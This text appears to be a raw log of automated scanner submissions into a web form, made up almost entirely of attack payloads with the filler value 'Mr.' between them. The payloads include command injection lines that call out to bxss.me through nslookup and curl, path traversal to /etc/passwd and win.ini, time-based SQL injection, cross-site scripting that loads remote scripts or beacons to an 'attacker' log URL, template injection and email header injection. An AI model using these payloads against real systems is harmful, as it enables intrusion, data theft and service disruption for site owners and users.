&nslookup -q=cname hitdrqkwxvxoz800af.bxss.me&'\"`0&nslookup -q=cname hitdrqkwxvxoz800af.bxss.me&`'

Mr.

../1

Mr.

'"()

Mr.

Mr.

Mr.

Mr.

xfs.bxss.me

Mr.

Mr.

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

file:///etc/passwd

Mr.

^(#$!@#$)(()))******

Mr.

|echo btbsag$()\ niqryn\nz^xyu||a #' |echo btbsag$()\ niqryn\nz^xyu||a #|" |echo btbsag$()\ niqryn\nz^xyu||a #

Mr.

&echo ddgiwz$()\ nelfki\nz^xyu||a #' &echo ddgiwz$()\ nelfki\nz^xyu||a #|" &echo ddgiwz$()\ nelfki\nz^xyu||a #

Mr.

Mr.

xfs.bxss.me

Mr.

)

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

;(nslookup -q=cname hitgykgyulmbnd8acf.bxss.me||curl hitgykgyulmbnd8acf.bxss.me)|(nslookup -q=cname hitgykgyulmbnd8acf.bxss.me||curl hitgykgyulmbnd8acf.bxss.me)&(nslookup -q=cname hitgykgyulmbnd8acf.bxss.me||curl hitgykgyulmbnd8acf.bxss.me)

Mr.

^(#$!@#$)(()))******

Mr.

".gethostbyname(lc("hites"."czbuzadva79f8.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(68).chr(101).chr(66)."

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

`(nslookup -q=cname hitdyqqkzrhqe64813.bxss.me||curl hitdyqqkzrhqe64813.bxss.me)`

Mr.

!(()&&!|*|*|

Mr.

'.gethostbyname(lc('hitrh'.'qzwmwqtj805e5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(84).chr(108).chr(89).'

Mr.

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

|(nslookup -q=cname hitzybmewremcb452b.bxss.me||curl hitzybmewremcb452b.bxss.me)

Mr.

)

Mr.

Mr.

&(nslookup -q=cname hithwwmjnhogl5c164.bxss.me||curl hithwwmjnhogl5c164.bxss.me)&'\"`0&(nslookup -q=cname hithwwmjnhogl5c164.bxss.me||curl hithwwmjnhogl5c164.bxss.me)&`'

Mr.

".gethostbyname(lc("hitqq"."bhjxupssc168e.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(84).chr(98).chr(87)."

Mr.

'.print(md5(31337)).'

Mr.

&nslookup -q=cname hitzfkknhothi3db79.bxss.me&'\"`0&nslookup -q=cname hitzfkknhothi3db79.bxss.me&`'

Mr.

${@print(md5(31337))}\

Mr.

'.gethostbyname(lc('hitwy'.'gjgodztwff680.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(70).chr(118).chr(90).'

Mr.

$(nslookup -q=cname hitoidbfsfsoz4951c.bxss.me||curl hitoidbfsfsoz4951c.bxss.me)

Mr.

${@print(md5(31337))}

Mr.

Mr."||sleep(271000)zzysxa||"

Mr.

";print(md5(31337));$a="

Mr.

Mr.'||sleep(271000)pzhybi||'

Mr.

(nslookup -q=cname hittbanynvdbbb0d8d.bxss.me||curl hittbanynvdbbb0d8d.bxss.me))

Mr.

';print(md5(31337));$a='

Mr.

|echo yjvprl$()\ dpgguk\nz^xyu||a #' |echo yjvprl$()\ dpgguk\nz^xyu||a #|" |echo yjvprl$()\ dpgguk\nz^xyu||a #

Mr.

Mr."&&sleep(271000)kzuoxh&&"

Mr.

".gethostbyname(lc("hitny"."sohpanfv3978c.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(83).chr(110).chr(87)."

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

&echo ruaaoz$()\ hnmuet\nz^xyu||a #' &echo ruaaoz$()\ hnmuet\nz^xyu||a #|" &echo ruaaoz$()\ hnmuet\nz^xyu||a #

Mr.

'.gethostbyname(lc('hitjm'.'dygusmuc47a67.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(79).chr(102).chr(78).'

Mr.

echo jigmwp$()\ pqwpwm\nz^xyu||a #' &echo jigmwp$()\ pqwpwm\nz^xyu||a #|" &echo jigmwp$()\ pqwpwm\nz^xyu||a #

Mr.

Mr.'&&sleep(271000)zfytzj&&'

Mr.

WEB-INF\web.xml

Mr.

'"()

^(#$!@#$)(()))******

Mr.

!(()&&!|||

Mr.

WEB-INF/web.xml

Mr.

Mr.

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Mr.

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Mr.

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Mr.

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

Mr.

..\..\..\..\..\..\..\..\windows\win.ini

Mr.

Mr.

Mr.

to@example.com>%0d%0abcc:009247.60685-6529.60685.0fa6a.19899.2@bxss.me

Mr.

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

Mr.

Mr.

Mr.

to@example.com>%0d%0abcc:009247.60685-6527.60685.0fa6a.19899.2@bxss.me

Mr.

/../../../../../../../../../../boot.ini

Mr.

Mr.

../../../../../../../../../../windows/win.ini%00.

Mr.

1%0abcc:009247.60685-6526.60685.0fa6a.19899.2@bxss.me

Mr.

Mr.

C:\WINDOWS\system32\drivers\etc\hosts

Mr.

1&n950126=v975488

Mr.

./Mr.

Mr.

Mr.

../Mr.

Mr.

Mr.

Mr.&n994973=v982972

Mr.

file:///etc/passwd

Mr.

../../../../../../../../../../../../../../windows/win.ini

to@example.com>%0d%0abcc:009247.60685-6521.60685.0fa6a.19899.2@bxss.me

Mr.

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

Mr.%0abcc:009247.60685-6520.60685.0fa6a.19899.2@bxss.me

Mr.

"+response.write(9190780*9142042)+"

;(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)|(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)&(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)

Mr.

`(nslookup -q=cname hitdzbsrtkawa95fd5.bxss.me||curl hitdzbsrtkawa95fd5.bxss.me)`

Mr.

|(nslookup -q=cname hitxnsacncyhu36232.bxss.me||curl hitxnsacncyhu36232.bxss.me)

Mr.

'+response.write(9190780*9142042)+'

Mr.

Mr.

response.write(9190780*9142042)

&(nslookup -q=cname hitahbgzogprf14bb1.bxss.me||curl hitahbgzogprf14bb1.bxss.me)&'\"`0&(nslookup -q=cname hitahbgzogprf14bb1.bxss.me||curl hitahbgzogprf14bb1.bxss.me)&`'

Mr.

&nslookup -q=cname hitmcjjvsogac2e44f.bxss.me&'\"`0&nslookup -q=cname hitmcjjvsogac2e44f.bxss.me&`'

Mr.

bxss.me/t/xss.html?%00

Mr.

'+'A'.concat(70-3).concat(22*4).concat(97).concat(67).concat(108).concat(79)+(require'socket'

Socket.gethostbyname('hitkb'+'uqhzweyrd886c.bxss.me.')[3].to_s)+'

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

$(nslookup -q=cname hitjrlmjspbawafe6b.bxss.me||curl hitjrlmjspbawafe6b.bxss.me)

Mr.

bxss.me/t/xss.html?%00

Mr.

(nslookup -q=cname hitenhomuhvzsdb7e9.bxss.me||curl hitenhomuhvzsdb7e9.bxss.me))

Mr.

"+"A".concat(70-3).concat(22*4).concat(105).concat(78).concat(117).concat(69)+(require"socket"

Socket.gethostbyname("hitpe"+"mqhedfol6755e.bxss.me.")[3].to_s)+"

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

|echo ecixkc$()\ kopgdx\nz^xyu||a #' |echo ecixkc$()\ kopgdx\nz^xyu||a #|" |echo ecixkc$()\ kopgdx\nz^xyu||a #

Mr.

Mr.

&echo njazzj$()\ qkswbw\nz^xyu||a #' &echo njazzj$()\ qkswbw\nz^xyu||a #|" &echo njazzj$()\ qkswbw\nz^xyu||a #

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

Mr.

Mr.

Mr.

Mr.

khLvqu4h

Mr.

echo gtoonq$()\ wbnlvm\nz^xyu||a #' &echo gtoonq$()\ wbnlvm\nz^xyu||a #|" &echo gtoonq$()\ wbnlvm\nz^xyu||a #

"+response.write(9892150*9320948)+"

Mr.

'+'A'.concat(70-3).concat(22*4).concat(119).concat(69).concat(122).concat(88)+(require'socket'

'+response.write(9892150*9320948)+'

/../../../../../../../../../../windows/system32/BITSADMIN.exe

response.write(9892150*9320948)

bxss.me/t/xss.html?%00

tFPg0amT

"+"A".concat(70-3).concat(22*4).concat(104).concat(82).concat(122).concat(76)+(require"socket"

HttP://bxss.me/t/xss.html?%00

Mr.

Mr.

1<InvalidTag

1<InvalidTag>cAZQ(9539)</script>9539

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%75%54%50%78%28%39%33%36%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>cAZQ(9831)</script>

1<InvalidTag>uTPx(9919)</script>9919

1<W4KNQJ>VUXG0[!+!]</W4KNQJ>

1<InvalidTag>uTPx(9549)</script>

1<InvalidTag >cAZQ(9514)</ScRiPt>

1<W1NJLO>WL0FQ[!+!]</W1NJLO>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1<InvalidTag >uTPx(9986)</ScRiPt>

dfb__${98991*97996}__::.x

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb${98991*97996}::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

bfgx1434%C0%BEz1%C0%BCz2a%90bcxhjl1434

bfgx2628%C0%BEz1%C0%BCz2a%90bcxhjl2628

bfg7782%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl7782

bfg9084%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9084

19690329

19110268

'"()&%<zzz><InvalidTag >cAZQ(9461)</ScRiPt>

'"()&%<zzz><InvalidTag >uTPx(9852)</ScRiPt>

1'"()&%<zzz><InvalidTag >cAZQ(9793)</ScRiPt>

1'"()&%<zzz><InvalidTag >uTPx(9291)</ScRiPt>

@@G0Wu6

��%2527%2522\'\"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1naI2qKWg')) OR 625=(SELECT 625 FROM PG_SLEEP(15))--

1VByuu6EA') OR 798=(SELECT 798 FROM PG_SLEEP(15))--

1MQ8o6Rn0' OR 818=(SELECT 818 FROM PG_SLEEP(15))--

1-1)) OR 113=(SELECT 113 FROM PG_SLEEP(15))--

1-1) OR 469=(SELECT 469 FROM PG_SLEEP(15))--

1-1 OR 667=(SELECT 667 FROM PG_SLEEP(15))--

1lPBlcoQu')); waitfor delay '0:0:15' --

1Tm0fmX47'); waitfor delay '0:0:15' --

19u97QGfN'; waitfor delay '0:0:15' --

1-1 waitfor delay '0:0:15' --

1-1)); waitfor delay '0:0:15' --

1-1); waitfor delay '0:0:15' --

1-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

1*if(now()=sysdate(),sleep(15),0)

-1" OR 3*2>(0+5+175-175) --

-1" OR 3*2<(0+5+175-175) --

-1" OR 3+175-175-1=0+0+0+1 --

-1" OR 2+175-175-1=0+0+0+1 --

-1' OR 3*2>(0+5+954-954) or 'aRz9d7aC'='

-1' OR 3*2<(0+5+954-954) or 'aRz9d7aC'='

-1' OR 3+954-954-1=0+0+0+1 or 'aRz9d7aC'='

-1' OR 2+954-954-1=0+0+0+1 or 'aRz9d7aC'='

-1' OR 3*2>(0+5+723-723) --

-1' OR 3*2<(0+5+723-723) --

-1' OR 3+723-723-1=0+0+0+1 --

-1' OR 2+723-723-1=0+0+0+1 --

-1 OR 3*2>(0+5+571-571)

-1 OR 3*2<(0+5+571-571)

-1 OR 3+571-571-1=0+0+0+1

-1 OR 2+571-571-1=0+0+0+1

-1 OR 3*2>(0+5+806-806) --

-1 OR 3*2<(0+5+806-806) --

-1 OR 3+806-806-1=0+0+0+1 --

-1 OR 2+806-806-1=0+0+0+1 --

Mr.

555

Mr.

555

1<aO2Q5on<

1<img sRc='http://attacker-9620/log.php?

1<aOXyFKr x=9456>

1<ifRAme sRc=9961.com></IfRamE>

1<W2MJ4T>41TWI[!+!]</W2MJ4T>

11ASaN

1}body{zzz:Expre/**/SSion(Zbps(9354))}

1<input autofocus onfocus=Zbps(9552)>

�<img zzz onmouseover=Zbps(90461) //�>

1<ScRiPt>Zbps(9403)</sCripT>

1\u003CScRiPt\Zbps(9124)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%5A%62%70%73%289593%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9395)>

1<img src=xyz OnErRor=Zbps(9788)>

1<img src=//xss.bxss.me/t/dot.gif onload=Zbps(9492)>

1<body onload=Zbps(9614)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9445'>

1<isindex type=image src=1 onerror=Zbps(9944)>

1<svg

� onload=Zbps(9888);>

1<InvalidTag

>Zbps(9165)</ScRiPt>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9971></ScRiPt>

1<InvalidTag

>Zbps(9847)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%5A%62%70%73%28%39%39%39%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

@@5HVxu

1<InvalidTag>Zbps(9750)</script>9750

��%2527%2522\'\"

1<InvalidTag>Zbps(9091)</script>

'"

1<WX9YQF>STVT1[!+!]</WX9YQF>

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1<InvalidTag >Zbps(9827)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

bfgx4760%C0%BEz1%C0%BCz2a%90bcxhjl4760

bfg6665%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl6665

19387457

'"()&%<zzz><InvalidTag >Zbps(9398)</ScRiPt>

1'"()&%<zzz><InvalidTag >Zbps(9511)</ScRiPt>

1<arWL61H<

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1<img sRc='http://attacker-9657/log.php?

1<arqdF97 x=9058>

1<ifRAme sRc=9767.com></IfRamE>

1<WB931P>0ENQU[!+!]</WB931P>

1zzddS

1}body{zzz:Expre/**/SSion(Zbps(9642))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=Zbps(9236)>

�<img zzz onmouseover=Zbps(90171) //�>

1<ScRiPt>Zbps(9234)</sCripT>

1\u003CScRiPt\Zbps(9734)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%5A%62%70%73%289315%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9180)>

1<img src=xyz OnErRor=Zbps(9251)>

1<img src=//xss.bxss.me/t/dot.gif onload=Zbps(9718)>

1<body onload=Zbps(9794)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9577'>

1<isindex type=image src=1 onerror=Zbps(9439)>

1YmjmJ0Uo')) OR 935=(SELECT 935 FROM PG_SLEEP(15))--

1<svg

1<InvalidTag

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9536></ScRiPt>

1<InvalidTag

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%5A%62%70%73%28%39%30%34%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>Zbps(9115)</script>9115

1<InvalidTag>Zbps(9621)</script>

1<WVPZJ7>Y5IRU[!+!]</WVPZJ7>

1<InvalidTag >Zbps(9307)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb${98991*97996}::.x

dfb[[${98991*97996}]]xca

1MKDrFvPX') OR 964=(SELECT 964 FROM PG_SLEEP(15))--

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

bfgx9596%C0%BEz1%C0%BCz2a%90bcxhjl9596

bfg10959%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl10959

19777082

'"()&%<zzz><InvalidTag >Zbps(9557)</ScRiPt>

1'"()&%<zzz><InvalidTag >Zbps(9943)</ScRiPt>

1Q7YXeaJc' OR 269=(SELECT 269 FROM PG_SLEEP(15))--

<!--

/\xfs.bxss.me?hkbakels.com.hk

//xfs.bxss.me?hkbakels.com.hk

xfs.bxss.me?hkbakels.com.hk

http://xfs.bxss.me?hkbakels.com.hk

914428

xfs.bxss.me

<!--

'"

1-1)) OR 200=(SELECT 200 FROM PG_SLEEP(15))--

/\xfs.bxss.me?hkbakels.com.hk

//xfs.bxss.me?hkbakels.com.hk

xfs.bxss.me?hkbakels.com.hk

'+'A'.concat(70-3).concat(22*4).concat(110).concat(68).concat(97).concat(76)+(require'socket'

Socket.gethostbyname('hitre'+'wxprmyyab70f1.bxss.me.')[3].to_s)+'

http://xfs.bxss.me?hkbakels.com.hk

"+"A".concat(70-3).concat(22*4).concat(116).concat(77).concat(122).concat(77)+(require"socket"

Socket.gethostbyname("hitii"+"whnqxnxf36b44.bxss.me.")[3].to_s)+"

941193

xfs.bxss.me

1-1) OR 579=(SELECT 579 FROM PG_SLEEP(15))--

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'+'A'.concat(70-3).concat(22*4).concat(119).concat(88).concat(118).concat(73)+(require'socket'

"+"A".concat(70-3).concat(22*4).concat(112).concat(86).concat(120).concat(68)+(require"socket"

1-1 OR 197=(SELECT 197 FROM PG_SLEEP(15))--

bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

1T0wNqcpt')); waitfor delay '0:0:15' --

bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

bxss.me

c:/windows/win.ini

/etc/shells

http://bxss.me/t/fit.txt%3F.jpg

Http://bxss.me/t/fit.txt

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

1wjVdTELa'); waitfor delay '0:0:15' --

"+response.write(9413908*9422846)+"

'+response.write(9413908*9422846)+'

response.write(9413908*9422846)

19IUACRAh'; waitfor delay '0:0:15' --

"+response.write(9593238*9273440)+"

'+response.write(9593238*9273440)+'

bxss.me

c:/windows/win.ini

/etc/shells

response.write(9593238*9273440)

http://bxss.me/t/fit.txt%3F.jpg

Http://bxss.me/t/fit.txt

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1-1 waitfor delay '0:0:15' --

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

${9999134+9999518}

${9999014+9999167}

<esi:include src="http://bxss.me/rpb.png"/>

1-1)); waitfor delay '0:0:15' --

<esi:include src="http://bxss.me/rpb.png"/>

1-1); waitfor delay '0:0:15' --

WEB-INF\web.xml

WEB-INF/web.xml

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

..\..\..\..\..\..\..\..\windows\win.ini

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

/../../../../../../../../../../boot.ini

1-1; waitfor delay '0:0:15' --

../../../../../../../../../../windows/win.ini%00.jpg

C:\WINDOWS\system32\drivers\etc\hosts

file:///etc/passwd

../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

